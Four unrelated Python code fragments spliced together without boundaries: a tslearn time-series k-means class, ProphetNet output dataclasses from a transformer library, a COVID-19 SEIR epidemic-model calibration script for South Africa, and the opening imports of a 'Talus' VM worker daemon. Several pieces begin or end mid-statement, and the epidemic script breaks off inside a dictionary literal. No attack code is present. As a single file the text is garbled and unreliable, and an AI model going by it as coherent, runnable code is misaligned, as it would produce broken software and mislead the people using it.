consecutive runs in terms of inertia.
metric : {"euclidean", "dtw", "softdtw"} (default: "euclidean")
Metric to be used for both cluster assignment and barycenter
computation. If "dtw", DBA is used for barycenter
computation.
max_iter_barycenter : int (default: 100)
Number of iterations for the barycenter computation process. Only used
if `metric="dtw"` or `metric="softdtw"`.
metric_params : dict or None (default: None)
Parameter values for the chosen metric.
For metrics that accept parallelization of the cross-distance matrix
computations, `n_jobs` key passed in `metric_params` is overridden by
the `n_jobs` argument.
n_jobs : int or None, optional (default=None)
The number of jobs to run in parallel for cross-distance matrix
computations.
Ignored if the cross-distance matrix cannot be computed using
parallelization.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See scikit-learns'
`Glossary <https://scikit-learn.org/stable/glossary.html#term-n-jobs>`_
for more details.
dtw_inertia: bool (default: False)
Whether to compute DTW inertia even if DTW is not the chosen metric.
verbose : int (default: 0)
If nonzero, print information about the inertia while learning
the model and joblib progress messages are printed.
random_state : integer or numpy.RandomState, optional
Generator used to initialize the centers. If an integer is given, it
fixes the seed. Defaults to the global
numpy random number generator.
init : {'k-means++', 'random' or an ndarray} (default: 'k-means++')
Method for initialization:
'k-means++' : use k-means++ heuristic. See `scikit-learn's k_init_
<https://github.com/scikit-learn/scikit-learn/blob/master/sklearn/\
cluster/k_means_.py>`_ for more.
'random': choose k observations (rows) at random from data for the
initial centroids.
If an ndarray is passed, it should be of shape (n_clusters, ts_size, d)
and gives the initial centers.
Attributes
----------
labels_ : numpy.ndarray
Labels of each point.
cluster_centers_ : numpy.ndarray of shape (n_clusters, sz, d)
Cluster centers.
`sz` is the size of the time series used at fit time if the init method
is 'k-means++' or 'random', and the size of the longest initial
centroid if those are provided as a numpy array through the init parameter.
inertia_ : float
Sum of distances of samples to their closest cluster center.
n_iter_ : int
The number of iterations performed during fit.
Notes
-----
If `metric` is set to `"euclidean"`, the algorithm expects a dataset of
equal-sized time series.
Examples
--------
>>> from tslearn.generators import random_walks
>>> X = random_walks(n_ts=50, sz=32, d=1)
>>> km = TimeSeriesKMeans(n_clusters=3, metric="euclidean", max_iter=5,
... random_state=0).fit(X)
>>> km.cluster_centers_.shape
(3, 32, 1)
>>> km_dba = TimeSeriesKMeans(n_clusters=3, metric="dtw", max_iter=5,
... max_iter_barycenter=5,
... random_state=0).fit(X)
>>> km_dba.cluster_centers_.shape
(3, 32, 1)
>>> km_sdtw = TimeSeriesKMeans(n_clusters=3, metric="softdtw", max_iter=5,
... max_iter_barycenter=5,
... metric_params={"gamma": .5},
... random_state=0).fit(X)
>>> km_sdtw.cluster_centers_.shape
(3, 32, 1)
>>> X_bis = to_time_series_dataset([[1, 2, 3, 4],
... [1, 2, 3],
... [2, 5, 6, 7, 8, 9]])
>>> km = TimeSeriesKMeans(n_clusters=2, max_iter=5,
... metric="dtw", random_state=0).fit(X_bis)
>>> km.cluster_centers_.shape
(2, 6, 1)
"""
def __init__(self, n_clusters=3, max_iter=50, tol=1e-6, n_init=1,
metric="euclidean", max_iter_barycenter=100,
metric_params=None, n_jobs=None, dtw_inertia=False,
verbose=0, random_state=None, init='k-means++'):
self.n_clusters = n_clusters
self.max_iter = max_iter
self.tol = tol
self.n_init = n_init
self.metric = metric
self.max_iter_barycenter = max_iter_barycenter
self.metric_params = metric_params
self.n_jobs = n_jobs
self.dtw_inertia = dtw_inertia
self.verbose = verbose
self.random_state = random_state
self.init = init
def _is_fitted(self):
check_is_fitted(self, ['cluster_centers_'])
return True
def _get_metric_params(self):
if self.metric_params is None:
metric_params = {}
else:
metric_params = self.metric_params.copy()
if "n_jobs" in metric_params.keys():
del metric_params["n_jobs"]
return metric_params
def _fit_one_init(self, X, x_squared_norms, rs):
metric_params = self._get_metric_params()
n_ts, sz, d = X.shape
if hasattr(self.init, '__array__'):
self.cluster_centers_ = self.init.copy()
elif isinstance(self.init, str) and self.init == "k-means++":
if self.metric == "euclidean":
self.cluster_centers_ = _kmeans_plusplus(
X.reshape((n_ts, -1)),
self.n_clusters,
x_squared_norms=x_squared_norms,
random_state=rs
)[0].reshape((-1, sz, d))
else:
if self.metric == "dtw":
def metric_fun(x, y):
return cdist_dtw(x, y, n_jobs=self.n_jobs,
verbose=self.verbose, **metric_params)
elif self.metric == "softdtw":
def metric_fun(x, y):
return cdist_soft_dtw(x, y, **metric_params)
else:
raise ValueError(
"Incorrect metric: %s (should be one of 'dtw', "
"'softdtw', 'euclidean')" % self.metric
)
self.cluster_centers_ = _k_init_metric(X, self.n_clusters,
cdist_metric=metric_fun,
random_state=rs)
elif self.init == "random":
indices = rs.choice(X.shape[0], self.n_clusters)
self.cluster_centers_ = X[indices].copy()
else:
raise ValueError("Value %r for parameter 'init'"
"is invalid" % self.init)
self.cluster_centers_ = _check_full_length(self.cluster_centers_)
old_inertia = numpy.inf
for it in range(self.max_iter):
self._assign(X)
if self.verbose:
print("%.3f" % self.inertia_, end=" --> ")
self._update_centroids(X)
if numpy.abs(old_inertia - self.inertia_) < self.tol:
break
old_inertia = self.inertia_
if self.verbose:
print("")
self._iter = it + 1
return self
def _transform(self, X):
metric_params = self._get_metric_params()
if self.metric == "euclidean":
return cdist(X.reshape((X.shape[0], -1)),
self.cluster_centers_.reshape((self.n_clusters, -1)),
metric="euclidean")
elif self.metric == "dtw":
return cdist_dtw(X, self.cluster_centers_, n_jobs=self.n_jobs,
verbose=self.verbose, **metric_params)
elif self.metric == "softdtw":
return cdist_soft_dtw(X, self.cluster_centers_, **metric_params)
else:
raise ValueError("Incorrect metric: %s (should be one of 'dtw', "
"'softdtw', 'euclidean')" % self.metric)
def _assign(self, X, update_class_attributes=True):
dists = self._transform(X)
matched_labels = dists.argmin(axis=1)
if update_class_attributes:
self.labels_ = matched_labels
_check_no_empty_cluster(self.labels_, self.n_clusters)
if self.dtw_inertia and self.metric != "dtw":
inertia_dists = cdist_dtw(X, self.cluster_centers_,
n_jobs=self.n_jobs,
verbose=self.verbose)
else:
inertia_dists = dists
self.inertia_ = _compute_inertia(inertia_dists,
self.labels_,
self._squared_inertia)
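# A minimal standalone sketch of the convergence pattern used in
# ``_fit_one_init`` above: alternate assignment and centroid updates until the
# drop in inertia falls below ``tol``.  ``compute_dists`` and
# ``update_centroids`` are illustrative callables, not part of tslearn, and the
# module-level ``numpy`` import of this file is assumed.
def _kmeans_loop_sketch(compute_dists, update_centroids, max_iter=50, tol=1e-6):
    old_inertia = numpy.inf
    for it in range(max_iter):
        dists = compute_dists()                      # shape (n_ts, n_clusters)
        labels = dists.argmin(axis=1)                # nearest centroid per series
        inertia = dists[numpy.arange(len(labels)), labels].sum()
        update_centroids(labels)
        if numpy.abs(old_inertia - inertia) < tol:
            break
        old_inertia = inertia
    return it + 1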
(:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
decoder_sequence_length, decoder_sequence_length)`.
Attention weights of the decoder, after the attention softmax, used to compute the weighted average in the
self-attention heads.
decoder_ngram_attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
decoder_sequence_length, decoder_sequence_length)`.
Attention weights of the predict stream of the decoder, after the attention softmax, used to compute the
weighted average in the self-attention heads.
decoder_cross_attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
encoder_sequence_length, decoder_sequence_length)`.
Attention weights of the cross-attention layer of the decoder, after the attention softmax, used to
compute the weighted average in the cross-attention heads.
encoder_last_hidden_state (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, encoder_sequence_length, hidden_size)`, `optional`):
Sequence of hidden-states at the output of the last layer of the encoder of the model.
encoder_hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, encoder_sequence_length, hidden_size)`.
Hidden-states of the encoder at the output of each layer plus the initial embedding outputs.
encoder_attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
encoder_sequence_length, encoder_sequence_length)`. Attention weights of the encoder, after the attention
softmax, used to compute the weighted average in the self-attention heads.
"""
loss: Optional[torch.FloatTensor] = None
logits: torch.FloatTensor = None
logits_ngram: Optional[torch.FloatTensor] = None
past_key_values: Optional[Tuple[torch.FloatTensor]] = None
decoder_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
decoder_ngram_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
decoder_attentions: Optional[Tuple[torch.FloatTensor]] = None
decoder_ngram_attentions: Optional[Tuple[torch.FloatTensor]] = None
decoder_cross_attentions: Optional[Tuple[torch.FloatTensor]] = None
encoder_last_hidden_state: Optional[torch.FloatTensor] = None
encoder_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
encoder_attentions: Optional[Tuple[torch.FloatTensor]] = None
@dataclass
class ProphetNetSeq2SeqModelOutput(ModelOutput):
"""
Base class for model encoder's outputs that also contains: pre-computed hidden states that can speed up sequential
decoding.
Args:
last_hidden_state (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, decoder_sequence_length, hidden_size)`):
Sequence of main stream hidden-states at the output of the last layer of the decoder of the model.
If :obj:`past_key_values` is used only the last hidden-state of the sequences of shape :obj:`(batch_size,
1, hidden_size)` is output.
last_hidden_state_ngram (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, ngram * decoder_sequence_length, config.vocab_size)`):
Sequence of predict stream hidden-states at the output of the last layer of the decoder of the model.
past_key_values (:obj:`List[torch.FloatTensor]`, `optional`, returned when ``use_cache=True`` is passed or when ``config.use_cache=True``):
List of :obj:`torch.FloatTensor` of length :obj:`config.n_layers`, with each tensor of shape :obj:`(2,
batch_size, num_attn_heads, decoder_sequence_length, embed_size_per_head)`).
Contains pre-computed hidden-states (key and values in the attention blocks) of the decoder that can be
used (see :obj:`past_key_values` input) to speed up sequential decoding.
decoder_hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, decoder_sequence_length, hidden_size)`.
Hidden-states of main stream of the decoder at the output of each layer plus the initial embedding outputs.
decoder_ngram_hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, ngram * decoder_sequence_length, hidden_size)`.
Hidden-states of the predict stream of the decoder at the output of each layer plus the initial embedding
outputs.
decoder_attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
decoder_sequence_length, decoder_sequence_length)`.
Attention weights of the decoder, after the attention softmax, used to compute the weighted average in the
self-attention heads.
decoder_ngram_attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
decoder_sequence_length, decoder_sequence_length)`.
Attention weights of the predict stream of the decoder, after the attention softmax, used to compute the
weighted average in the self-attention heads.
decoder_cross_attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
encoder_sequence_length, decoder_sequence_length)`.
Attention weights of the cross-attention layer of the decoder, after the attention softmax, used to
compute the weighted average in the cross-attention heads.
encoder_last_hidden_state (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, encoder_sequence_length, hidden_size)`, `optional`):
Sequence of hidden-states at the output of the last layer of the encoder of the model.
encoder_hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, encoder_sequence_length, hidden_size)`.
Hidden-states of the encoder at the output of each layer plus the initial embedding outputs.
encoder_attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
encoder_sequence_length, encoder_sequence_length)`.
Attention weights of the encoder, after the attention softmax, used to compute the weighted average in the
self-attention heads.
"""
last_hidden_state: torch.FloatTensor
last_hidden_state_ngram: Optional[torch.FloatTensor] = None
past_key_values: Optional[Tuple[torch.FloatTensor]] = None
decoder_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
decoder_ngram_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
decoder_attentions: Optional[Tuple[torch.FloatTensor]] = None
decoder_ngram_attentions: Optional[Tuple[torch.FloatTensor]] = None
decoder_cross_attentions: Optional[Tuple[torch.FloatTensor]] = None
encoder_last_hidden_state: Optional[torch.FloatTensor] = None
encoder_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
encoder_attentions: Optional[Tuple[torch.FloatTensor]] = None
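# Hedged usage sketch (not part of the library source): the dataclass above is
# a ``ModelOutput`` subclass, so fields can be read as attributes once a model
# populates them.  The tensor shapes below are illustrative placeholders and
# ``torch`` is assumed to be imported at module level, as elsewhere in this file.
def _example_seq2seq_output():
    batch_size, seq_len, hidden_size, ngram = 2, 7, 16, 2
    outputs = ProphetNetSeq2SeqModelOutput(
        last_hidden_state=torch.zeros(batch_size, seq_len, hidden_size),
        last_hidden_state_ngram=torch.zeros(batch_size, ngram * seq_len, hidden_size),
    )
    return outputs.last_hidden_state.shape, outputs.last_hidden_state_ngram.shape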
@dataclass
class ProphetNetDecoderModelOutput(ModelOutput):
"""
Base class for model's outputs that may also contain a past key/values (to speed up sequential decoding).
Args:
last_hidden_state (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, decoder_sequence_length, hidden_size)`):
Sequence of main stream hidden-states at the output of the last layer of the decoder of the model.
If :obj:`past_key_values` is used only the last hidden-state of the sequences of shape :obj:`(batch_size,
1, hidden_size)` is output.
last_hidden_state_ngram (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, ngram * decoder_sequence_length, config.vocab_size)`):
Sequence of predict stream hidden-states at the output of the last layer of the decoder of the model.
past_key_values (:obj:`List[torch.FloatTensor]`, `optional`, returned when ``use_cache=True`` is passed or when ``config.use_cache=True``):
List of :obj:`torch.FloatTensor` of length :obj:`config.n_layers`, with each tensor of shape :obj:`(2,
batch_size, num_attn_heads, decoder_sequence_length, embed_size_per_head)`).
Contains pre-computed hidden-states (key and values in the attention blocks) of the decoder that can be
used (see :obj:`past_key_values` input) to speed up sequential decoding.
hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, decoder_sequence_length, hidden_size)`.
Hidden-states of main stream of the decoder at the output of each layer plus the initial embedding outputs.
ngram_hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, ngram * decoder_sequence_length, hidden_size)`.
Hidden-states of the predict stream of the decoder at the output of each layer plus the initial embedding
outputs.
attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
decoder_sequence_length, decoder_sequence_length)`.
Attention weights of the decoder, after the attention softmax, used to compute the weighted average in the
self-attention heads.
ngram_attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
decoder_sequence_length, decoder_sequence_length)`.
Attention weights of the predict stream of the decoder, after the attention softmax, used to compute the
weighted average in the self-attention heads.
cross_attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_attn_heads,
encoder_sequence_length, decoder_sequence_length)`.
Attention weights of the cross-attention layer of the decoder, after the attention softmax, used to
compute the weighted average in the cross-attention heads.
"""
last_hidden_state: torch.FloatTensor
last_hidden_state_ngram: Optional[torch.FloatTensor] = None
past_key_values: Optional[Tuple[torch.FloatTensor]] = None
hidden_states: Optional[Tuple[torch.FloatTensor]] = None
hidden_states_ngram: Optional[Tuple[torch.FloatTensor]] = None
attentions: Optional[Tuple[torch.FloatTensor]] = None
ngram_attentions: Optional[Tuple[torch.FloatTensor]] = None
cross_attentions: Optional[Tuple[torch.FloatTensor]] = None
@dataclass
class ProphetNetDecoderLMOutput(ModelOutput):
"""
Base class for model's outputs that may also contain a past key/values (to speed up sequential decoding).
Args:
loss (:obj:`torch.FloatTensor` of shape :obj:`(1,)`, `optional`,
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import datetime
from seir.wrapper import MultiPopWrapper
from seir.utils import plot_solution
# read calibration data
actual_hospitalisations = pd.read_excel('data/calibration.xlsx', sheet_name='Hospitalisations')
actual_hospitalisations['Date'] = [pd.to_datetime(x).date() for x in actual_hospitalisations['Date']]
# TODO: should check if file is downloaded: if not, download, then use the downloaded file
actual_infections = pd.read_csv(
'https://raw.githubusercontent.com/dsfsi/covid19za/master/data/covid19za_provincial_cumulative_timeline_confirmed.csv')
actual_infections.rename(columns={'date': 'Date', 'total': 'Cum. Confirmed'}, inplace=True)
actual_infections.index = pd.to_datetime(actual_infections['Date'], dayfirst=True)
actual_infections = actual_infections.resample('D').mean().ffill().reset_index()
actual_infections['Date'] = [pd.to_datetime(x, dayfirst=True).date() for x in actual_infections['Date']]
# TODO: should check if file is downloaded: if not, download, then use the downloaded file
reported_deaths = pd.read_csv(
'https://raw.githubusercontent.com/dsfsi/covid19za/master/data/covid19za_timeline_deaths.csv')
reported_deaths.rename(columns={'date': 'Date'}, inplace=True)
reported_deaths['Date'] = [pd.to_datetime(x, dayfirst=True).date() for x in reported_deaths['Date']]
actual_deaths = reported_deaths.groupby('Date').report_id.count().reset_index()
actual_deaths.rename(columns={'report_id': 'Daily deaths'}, inplace=True)
actual_deaths.index = pd.to_datetime(actual_deaths['Date'])
actual_deaths = actual_deaths.resample('D').mean().fillna(0).reset_index()
actual_deaths['Cum. Deaths'] = np.cumsum(actual_deaths['Daily deaths'])
# variable parameters for front-end
asymptomatic_prop = 0.75 # 0.2-0.8
asymp_rel_infectivity = 0.5 # 0.3 - 1
asymp_prop_imported = 0.0 # 0 - 0.8
r0 = 2.6 # 1.5 - 5.5
lockdown_ratio = 0.6 # 0.25 - 0.8
imported_scale = 2.5 # 0.5 - 2
lockdown_period = 35 # 35, 42, 49, 56, 63, 70
social_distancing_ratio = 0.75 # 0.5-1
period_asymp = 2.3 # 8-12
period_mild_infect = 2.3 # 2-4
period_severe_infect = 2.3 # 2-4
period_severe_isolate = 6 - period_severe_infect
period_hosp_if_not_icu = 10 # 6-10
period_hosp_if_icu = 8 # 6-10
period_icu_if_recover = 10 # 8-12
period_icu_if_die = 6 # 3-7
mort_loading = 1.0 # 0.5 - 1.5
prop_mild_detected = 0.3 # 0.2 - 0.8
hosp_to_icu = 0.2133 # 0.1 - 0.4 (0.21330242 = Ferguson)
descr = 'asymp_' + str(asymptomatic_prop) + '_R0_' + str(r0) + '_imported_scale_' + str(
imported_scale) + '_lockdown_' + str(lockdown_ratio) + '_postlockdown_' + str(
social_distancing_ratio) + '_ICU_' + str(hosp_to_icu) + '_mort_' + str(mort_loading) + '_asympinf_' + str(
asymp_rel_infectivity)
full_descr = f'Baseline R0: {r0:.1f}, asymptomatic proportion: {asymptomatic_prop:.0%}, asymptomatic relative ' \
f'infectiousness {asymp_rel_infectivity:.0%}, {prop_mild_detected:.0%} of mild cases detected \n '
full_descr += f'Imported scaling factor {imported_scale:.2f}, asymptomatic proportion imported {asymp_prop_imported:.0%}\n '
full_descr += f'Lockdown period: {lockdown_period:,.0f}, R0 relative to baseline {lockdown_ratio:.0%} in lockdown,' \
f'{social_distancing_ratio:.0%} post-lockdown \n '
full_descr += f'Infectious days pre-isolation: {period_asymp} asymptomatic, {period_mild_infect} mild, {period_severe_infect} severe; severe isolation days pre-hospitalisation: {period_severe_isolate} \n'
full_descr += f'Hospital days: {period_hosp_if_not_icu} not critical, {period_hosp_if_icu} critical plus {period_icu_if_recover} in ICU if recover/{period_icu_if_die} if die \n'
full_descr += f'Proportion of hospitalised cases ending in ICU: {hosp_to_icu:.2%}, mortality loading {mort_loading:.0%}'
# get s0 from file:
df = pd.read_csv('data/Startpop_2density_0comorbidity.csv') # , index_col=0)
df['density'] = df['density'].map({'High': 'high', 'Low': 'low'})
df['label'] = df['age'].str.lower() + '_' + df['sex'].str.lower() + '_' + df['density'].str.lower()
df_dict = df[['label', 'Population']].to_dict()
s_0 = {df_dict['label'][i]: df_dict['Population'][i] for i in df_dict['label'].keys()}
# Ferguson et al. parameterisation
ferguson = {'0-9': [0.001, 0.05, 0.00002],
'10-19': [0.003, 0.05, 0.00006],
'20-29': [0.012, 0.05, 0.0003],
'30-39': [0.032, 0.05, 0.0008],
'40-49': [0.049, 0.063, 0.0015],
'50-59': [0.102, 0.122, 0.006],
'60-69': [0.166, 0.274, 0.022],
'70-79': [0.243, 0.432, 0.051],
'80+': [0.273, 0.709, 0.093]}
# work out deaths as % of those entering ICU
for key in ferguson:
# TODO: add this calc to the df, not to the lists.
ferguson[key].append(ferguson[key][2] / ferguson[key][1] / ferguson[key][0])
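# Worked example of the ratio appended above (deaths as a fraction of ICU
# admissions), using the '80+' band: 0.093 / 0.709 / 0.273 ~= 0.48, i.e. just
# under half of the 80+ patients entering ICU are assumed to die.  This check
# only restates numbers already present in the ferguson table.
assert abs(ferguson['80+'][3] - 0.093 / 0.709 / 0.273) < 1e-12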
# age profile - calculate ICU transition adjustment
age_profile = df.groupby('age').Population.sum().reset_index()
ferguson_df = pd.DataFrame(ferguson).T.reset_index()
ferguson_df.rename(columns={'index': 'age', 0: 'symp_to_hosp', 1: 'hosp_to_icu', 2: 'symp_to_dead', 3: 'icu_to_dead'},
inplace=True)
age_profile['Proportion'] = age_profile['Population'] / age_profile['Population'].sum()
age_profile = age_profile.merge(ferguson_df[['age', 'symp_to_hosp', 'hosp_to_icu']], on='age')
age_profile['hosp'] = age_profile['Proportion'] * age_profile['symp_to_hosp']
age_profile['prop_hosp'] = age_profile['hosp'] / age_profile['hosp'].sum()
age_profile['overall_hosp_to_icu'] = age_profile['prop_hosp'] * age_profile['hosp_to_icu']
overall_hosp_to_icu = age_profile['overall_hosp_to_icu'].sum()
icu_adjustment = hosp_to_icu / overall_hosp_to_icu # ~1 when hosp_to_icu is == ferguson number
# hard-coded parameters
infectious_func = lambda t: 1 if t < 11 else (
1 - (1 - social_distancing_ratio) / 11 * (t - 11)) if 11 <= t < 22 else lockdown_ratio if 22 <= t < (
22 + lockdown_period) else social_distancing_ratio
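# Illustrative evaluations of the phased contact-rate function above, given the
# parameter values chosen earlier in this script: full mixing before day 11, a
# linear taper towards the social-distancing level until day 22, the lockdown
# level until day 22 + lockdown_period, then the post-lockdown level after that.
_example_contact_rates = {
    0: infectious_func(0),        # 1.0
    16.5: infectious_func(16.5),  # 0.875, halfway through the taper
    30: infectious_func(30),      # lockdown_ratio = 0.6
    200: infectious_func(200),    # social_distancing_ratio = 0.75
}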
c = 1
s = 0.06 # proportion of imported cases below 60 that are severe (1-s are mild)
# scale of ferguson ratio for 60+ - setting to inverse value from ferguson means we assume 100% of cases 60+ are severe
scale = {'60-69': 1,
'70-79': 1/ferguson['70-79'][0],
'80+': 1/ferguson['80+'][0]}
a = 0.25
l = asymp_prop_imported / (1 - asymp_prop_imported)
x = c * imported_scale
imported_func = lambda t: {'0-9_male_high': [0.0101 * x * l * np.exp(a * t), 0.0101 * x * (1 - s) * np.exp(a * t),
0.0101 * x * s * np.exp(a * t), 0, 0, 0],
'10-19_male_high': [0.0101 * x * l * np.exp(a * t), 0.0101 * x * (1 - s) * np.exp(a * t),
0.0101 * x * s * np.exp(a * t), 0, 0, 0],
'20-29_male_high': [0.0657 * x * l * np.exp(a * t), 0.0657 * x * (1 - s) * np.exp(a * t),
0.0657 * x * s * np.exp(a * t), 0, 0, 0],
'30-39_male_high': [0.1768 * x * l * np.exp(a * t), 0.1768 * x * (1 - s) * np.exp(a * t),
0.1768 * x * s * np.exp(a * t), 0, 0, 0],
'40-49_male_high': [0.0960 * x * l * np.exp(a * t), 0.0960 * x * (1 - s) * np.exp(a * t),
0.0960 * x * s * np.exp(a * t), 0, 0, 0],
'50-59_male_high': [0.1717 * x * l * np.exp(a * t), 0.1717 * x * (1 - ferguson['50-59'][0]) * np.exp(a * t),
0.1717 * x * ferguson['50-59'][0] * np.exp(a * t), 0, 0, 0],
'60-69_male_high': [0.0758 * x * l * np.exp(a * t), 0.0758 * x * (1 - scale['60-69'] * ferguson['60-69'][0]) * np.exp(a * t), 0.0758 * x * scale['60-69'] * ferguson['60-69'][0] * np.exp(a * t), 0, 0, 0],
'70-79_male_high': [0.0202 * x * l * np.exp(a * t), 0.0202 * x * (1 - scale['70-79'] * ferguson['70-79'][0]) * np.exp(a * t), 0.0202 * x * scale['70-79'] * ferguson['70-79'][0] * np.exp(a * t), 0, 0, 0],
'80+_male_high': [0.0051 * x * l * np.exp(a * t), 0.0051 * x * (1 - scale['80+'] * ferguson['80+'][0]) * np.exp(a * t), 0.0051 * x * scale['80+'] * ferguson['80+'][0] * np.exp(a * t), 0, 0, 0],
'0-9_female_high': [0.0000 * x * l * np.exp(a * t), 0.0000 * x * (1 - s) * np.exp(a * t),
0.0000 * x * s * np.exp(a * t), 0, 0, 0],
'10-19_female_high': [0.0101 * x * l * np.exp(a * t), 0.0101 * x * (1 - s) * np.exp(a * t),
0.0101 * x * s * np.exp(a * t), 0, 0, 0],
'20-29_female_high': [0.0606 * x * l * np.exp(a * t), 0.0606 * x * (1 - s) * np.exp(a * t),
0.0606 * x * s * np.exp(a * t), 0, 0, 0],
'30-39_female_high': [0.1111 * x * l * np.exp(a * t), 0.1111 * x * (1 - s) * np.exp(a * t),
0.1111 * x * s * np.exp(a * t), 0, 0, 0],
'40-49_female_high': [0.0556 * x * l * np.exp(a * t), 0.0556 * x * (1 - s) * np.exp(a * t),
0.0556 * x * s * np.exp(a * t), 0, 0, 0],
'50-59_female_high': [0.0657 * x * l * np.exp(a * t), 0.0657 * x * (1 - s) * np.exp(a * t),
0.0657 * x * s * np.exp(a * t), 0, 0, 0],
'60-69_female_high': [0.0152 * x * l * np.exp(a * t), 0.0152 * x * (1 - scale['60-69'] * ferguson['60-69'][0]) * np.exp(a * t), 0.0152 * x * scale['60-69'] * ferguson['60-69'][0] * np.exp(a * t), 0, 0,
0],
'70-79_female_high': [0.0303 * x * l * np.exp(a * t), 0.0303 * x * (1 - scale['70-79'] * ferguson['70-79'][0]) * np.exp(a * t), 0.0303 * x * scale['70-79'] * ferguson['70-79'][0] * np.exp(a * t), 0, 0,
0],
'80+_female_high': [0.0000 * x * l * np.exp(a * t), 0.0000 * x * (1 - scale['80+'] * ferguson['80+'][0]) * np.exp(a * t), 0.0000 * x * scale['80+'] * ferguson['80+'][0] * np.exp(a * t), 0, 0, 0]
} if t < 22 else 0
init_vectors = {
's_0': s_0,
'i_0': {'30-39_male_high': [0, 0, 0, 0, 0, 0]}
}
model = MultiPopWrapper(
pop_categories={'age': ['0-9', '10-19', '20-29', '30-39', '40-49', '50-59', '60-69', '70-79', '80+'],
'sex': ['male', 'female'],
'density': ['high', 'low']
},
inf_labels=['AS', 'M', 'S', 'SI', 'H', 'ICU'],
alpha={'0-9': [asymptomatic_prop, (1 - asymptomatic_prop) * (1 - ferguson['0-9'][0]),
(1 - asymptomatic_prop) * ferguson['0-9'][0], 0, 0, 0],
'10-19': [asymptomatic_prop, (1
#!/usr/bin/env python
# encoding: utf-8
"""
The main worker daemon library.
"""
from Queue import Queue
import twisted.internet
import twisted.internet.protocol
import twisted.internet.reactor
import twisted.internet.endpoints
from twisted.protocols import basic as twisted_basic
import argparse
import colorama
import imp
import json
import libvirt
import logging
import math
import multiprocessing
import netifaces
import os
import pika
import pymongo
import sh
import signal
import socket
import struct
import sys
import threading
import time
import traceback
import twisted
import uuid
from slave.amqp_man import AmqpManager
from slave.vm import VMHandler,ImageManager
import slave.models
class TalusFormatter(logging.Formatter):
"""Colorize the logs
"""
def __init__(self):
logging.Formatter.__init__(self)
def format(self, record):
msg = "{time} {level:<8} {name:<12} {message}".format(
time = self.formatTime(record),
level = record.levelname,
